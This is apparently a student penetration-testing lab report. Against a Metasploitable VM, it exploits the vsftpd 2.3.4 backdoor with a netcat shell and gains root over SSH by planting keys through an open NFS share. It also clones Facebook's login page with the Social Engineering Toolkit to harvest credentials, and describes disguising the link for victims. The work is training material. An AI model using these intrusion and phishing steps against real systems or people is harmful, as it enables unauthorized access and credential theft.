Task 1
- Start Metasploitable VM
Figure 1: Start Metasploitable
In figure 1, it shows that metasploitable is started.
- Log in as msfadmin with a password of msfadmin
Figure 2: Login
In figure 2, it shows metasploitable is logged in using acc msfadmin and password msfadmin.
- Execute ifconfig
Figure 3: Execute ifconfig
Figure 3 shows ifconfig is executed and IP of metasploitable obtained is 192.168.109.128.
- Start Kali
Figure 4: Start Kali and login
In figure 4, kali is started and logged in.
- Kali ping Metasploitable(192.168.109.128)
Figure 5: Ping Metasploitable
In figure 5, metasploitable is ping-ed from kali using the IP address found in step 3.
- Scanning the Metasploitable Target with Nmap
Nmap -A -p20-21 192.168.109.128
Figure 6: Scan Metasploitable using Nmap
In figure 6, Metasploitable is scanned using Nmap -A -p20-21 192.168.109.128 and found that vsftpd 2.3.4 is open which can be exploited afterwards.
- Understanding the Backdoor Googling vsftpd 2.3.4 quickly shows articled explaining the backdoor, as shown below.
Figure 7: Explanation about vulnerability found
Figure 7 shows the article explaining about vsftpd 2.3.4.
- On Kali, in a Terminal window, execute these commands:
apt-get update
apt install ftp -y
FTP installs, as shown below.
Figure 8: Install and update FTP
In figure 8, it shows that FTP is installed and updated using command shown above.
- On Kali, in a Terminal window, execute this command, replacing the IP address with the IP address of your Metasploitable machine.
ftp 192.168.109.128
Enter a username of
aa:)
and type anything for the password.
There is no response--the login seems to hang, as shown below.
Figure 9: Connecting Metasploitable from Kali
In figure 9, Metasploitable is connected from Kali using command shown above.
- Open a new Terminal window and execute this command, replacing the IP address with the IP address of your Metasploitable machine.
nc 192.168.109.128 6200
There is no prompt, but you have a shell. To see that, execute these commands:
whoami
uname -a
You're root on metasploitable, as shown below.
Figure 10: Root privilege gained
Figure 11: Root privilege gained
In figure 10 and 11, they show that root privilege in metasploitable has been gained.
Metasploitable is a linux virtual machine which allows user to practice about penetration testing technique, conduct security training and test security tools. User is able to practice and learn about Metasploit using Metasploitable. In this question and each of the steps done, we have learnt how to exploit the vulnerability found using Nmap in Kali in order to gain root privilege of Metasploitable.
Task 2 Exploiting NFS and SSH
1. Scanning the Metasploitable Target with Nmap
From your Kali machine, in a Terminal, execute this command, replacing the IP address with the IP address of your Metasploitable machine.
nmap -A 192.168.109.128
Nmap produces several screens of output.
Find the results for port 111. It detected nfs, as shown below.
Figure 12: Execute Nmap -A 192.168.109.128
Figure 12 shows command of Nmap -A 192.168.109.128 is executed.
Figure 13: Result of Nmap -A 192.168.109.128
Figure 13 shows the result of Nmap -A 192.168.109.128 and it is found that nfs service is open.
2. Enumerating NFS
NFS (Network File System) is used by Linux to share files.
Nmap has a script to enumerate them.
From your Kali machine, in a Terminal, execute this command, replacing the IP address with the IP address of your Metasploitable machine.
nmap --script-help nfs-ls
The volume / is shared, with "Read" and "Modify" permissions, as shown below.
Figure 14: Function of Nmap --script-help nfs-ls
In figure 14, it shows what result does the command of Nmap --script-help nfs-ls provide.
3. From your Kali machine, in a Terminal, execute this command, replacing the IP address with the IP address of your Metasploitable machine.
nmap --script=nfs-ls 192.168.109.128
The volume / is shared, with "Read" and "Modify" permissions, as shown below.
Figure 15: Obtain information about file in Metasploitable 192.168.109.128
Figure 15 shows the information about file in Metasploitable 192.168.109.128 including the permission for each of the files.
4. Mouting the NFS Share
From your Kali machine, in a Terminal, execute these commands, replacing the IP address with the IP address of your Metasploitable machine.
These commands install some software needed to use nfs shares, and mount the shared folder on your Kali system in the /tmp folder.
apt-get update
apt-get install nfs-common -y
mkdir /tmp/mount
mount -t nfs 192.168.109.128:/ /tmp/mount -o nolock
cd /tmp/mount
ls
You see all the folders expected at the root of a Linux system, as shown below.
Figure 16: Retrieve update
In figure 16, update of kali is retrieved and updated.
Figure 17: Install nfs
In figure 17, nfs is installed.
Figure 18: /tmp/mount is created
Figure 18 shows that /tmp/mount is created using command shown above.
Figure 19: Obtain file /tmp/mount contained
In figure 19, is shows that /tmp/mount is checked if it is created and file contained in it is obtained.
5. From your Kali machine, in a Terminal, execute these commands to find the SSH keys for the "msfadmin" user.
cd home
cd msfadmin
ls -al
cd .ssh
ls -l
Three files are found, as shown below.
- authorized_keys
- id_rsa
- id_rsa.pub
Figure 20: Obtain file contained in .ssh
Figure 20 shows steps required to retrieve file contained in .ssh and find out file which stores authorized key.
6. Let's look at these files.
From your Kali machine, in a Terminal, execute these commands.
ls
cat authorized_keys
The authorized_keys file contains public keys of authorized users, as shown below.
Figure 21: Check key stored in authorized_key file
Figure 21 shows the key stored in authorized_key.
7. Generating SSH Keys
To exploit the Metasploitable box, we'll add our public SSH key to the authorized_keys file. So first we need to generate keys.
From your Kali machine, in a Terminal, execute this command:
ssh-keygen
The keys are generated and placed in the /root/.ssh directory, as shown below.
Figure 22: Generate public key
Figure 22 shows that a public key is generated and stored in /root/.ssh.
8.Adding Your Public Key to authorized_keys
From your Kali machine, in a Terminal, execute these commands:
cat /root/.ssh/id_rsa.pub >> ./authorized_keys
cat authorized_keys
Your key appears at the end of the file, as shown below.
Figure 23: Move key generated into authorized_keys file
In figure 23, key generated is moved into authorized_keys file.
Figure 24: Check key contained in authorized_keys file
Figure 24 shows that key contained in authorized_keys file is checked in order to ensure the key generated is moved into it successfully which is the ssh-rsa key.
9. Connecting via SSH
From your Kali machine, in a Terminal, execute this command, replacing the IP address with the IP address of your Metasploitable machine.
ssh msfadmin@192.168.109.128
You get a shell as the "msfadmin" user, as shown below.
Figure 25: Connect to Metasploitable using ssh
In figure 25, Metasploitable is connected using msfadmin account using ssh from Kali.
Note: if there sometime can connect, like:unable to negotiate with 192.168.109.128 port 22: no matching host key type found. their offer: ssh-rsa,ssh-dss
Solution: create a file name ‘config ‘ without extension name in .ssh, The file content is:
‘Host *
HostKeyAlgorithms +ssh-rsa
PubkeyAcceptedKeyTypes +ssh-rsa’
This is because Openssh high version problem, the solution is to uninstall the dry version and replace it with a lower version or create the config file as above
10. Adding Your Public Key to Root's authorized_keys
To get root access, all you need to do is add that public key to the root user's authorized_keys file.
From your Kali machine, in a Terminal, execute these commands, replacing the IP address with the IP address of your Metasploitable machine.
cd /tmp/mount/root/.ssh
cat /root/.ssh/id_rsa.pub >> ./authorized_keys
ssh root@192.168.109.128
whoami
Your get a root shell, as shown below.
Figure 26: Add public key to root user's authorized_keys file
In figure 26, it shows that public key is added to root user’s authorized_keys file and root access of Metasploitable is obtained.
Figure 27: Root access gained
In figure 27, it shows that root access to metasploitable is gained using ssh.
Network File Sharing (NFS) is a protocol of Linux which allows user to share files and directories to another Linux machine through the same network connected while SSH is a protocol which allows 2 machine to communicate with each other and share data between them, In this lesson, we learned the way to send files between kali and Metasploitable using NFS and SSH. Besides that, we learned the way to create a public key and make it as authorized key and also the way to gain root access of Metasploitable using the key generated.
Task 3
Social engineering using Kali Linux
Using Kali Linux Social Engineering Toolkit to clone a website and send clone link to victim. Once victim attempt to login to the website using the link, his credentials will be extracted from Linux terminal
Steps:
1. Open Kali Linux
2. Go to Application
3. Click Social Engineering Tools
4. Click Social Engineering Toolkit
Figure 28: Search for social engineering toolkit
Figure 28 shows that social engineering toolkit is found in Kali.
5. Enter “Y” to proceed
Figure 29: Run social engineering toolkit
Figure 29 shows that social engineering toolkit is run, and “Y” is entered to proceed.
6. Type “1” for Social Engineering Attacks
Figure 30: List of option in initial menu
Figure 30 shows a list of option and then social engineering attack is selected by entering 1.
7. Type “2” for website attack vector
Figure 31: List of option after selecting social engineering attack
Figure 31 shows a list of option and then website attack vectors is selected by entering 2 in figure 32.
8. Type “3” for Credentials harvester attack method
Figure 32: List of option after selecting website attack vectors
Figure 32 shows a list of option and then credentials harvester attack method is selected by entering 3 in figure 33.
9. Type “2” for Site Cloner
Figure 33: List of option after selecting harvester attack method
Figure 33 shows a list of option and then site cloner is selected by entering 2 in figure 34.
10. Type IP address of Kali Linux machine
Figure 34: Selected site cloner
Figure 35: Enter IP address
Figure 35 shows that IP address of Kali (192.168.109.129) is entered.
11. Type target URL
Figure 36: Enter target URL
Figure 36 shows that target URL to be cloned is entered which is https://www.facebook.com/login/
12. Now, http://(IP from step 10) will be used. You can use this address directly, but it is not an effective way in real scenarios. This address is hidden in a fake URL and forwarded to the victim. Due to cloning, the user could not identify the fake website unless be observes the URL. If he accidentally clicks and attempts to log in, credentials will be fetched to Linux terminal. You are using http://(IP from step 10) to proceed
Figure 37: Website cloned
Figure 37 shows a fake website of Facebook login page cloned.
13. Login using username and password
Username: admin
Password: Admin@123
Figure 38: Login using website cloned
In figure 38, it shows that user is logged in using the website cloned by username: aa and password: bb
14. Go back to Linux terminal and observe
Figure 39: Possible username and password captured
Figure 39 shows the input in the username and password field of fake website.
Figure 40: Credential capture terminated, and report generated
Figure 40 shows that credential capture has been terminated and the report of input captured is generated.
Figure 41: Report generated
In figure 41, it shows the report generated which is stored in the local directory of linux machine (/root/.set/reports).
Figure 42: Detail of report generated
Figure 42 shows the content of report generated which contains the input of credential captured from the fake website.
Social engineering toolkit allows user to perform various type of social engineering attack. In this question, credentials harvester attack method is used by cloning a website. Website clone is used to create a fake website and used for phishing. Credential entered by user on the website will be saved and retrieved. Our target in this question is user that uses Facebook as the webpage cloned is the login page of Facebook. In this question, we learned the way to clone a fake website in order to obtain legitimate user’s credential for that website.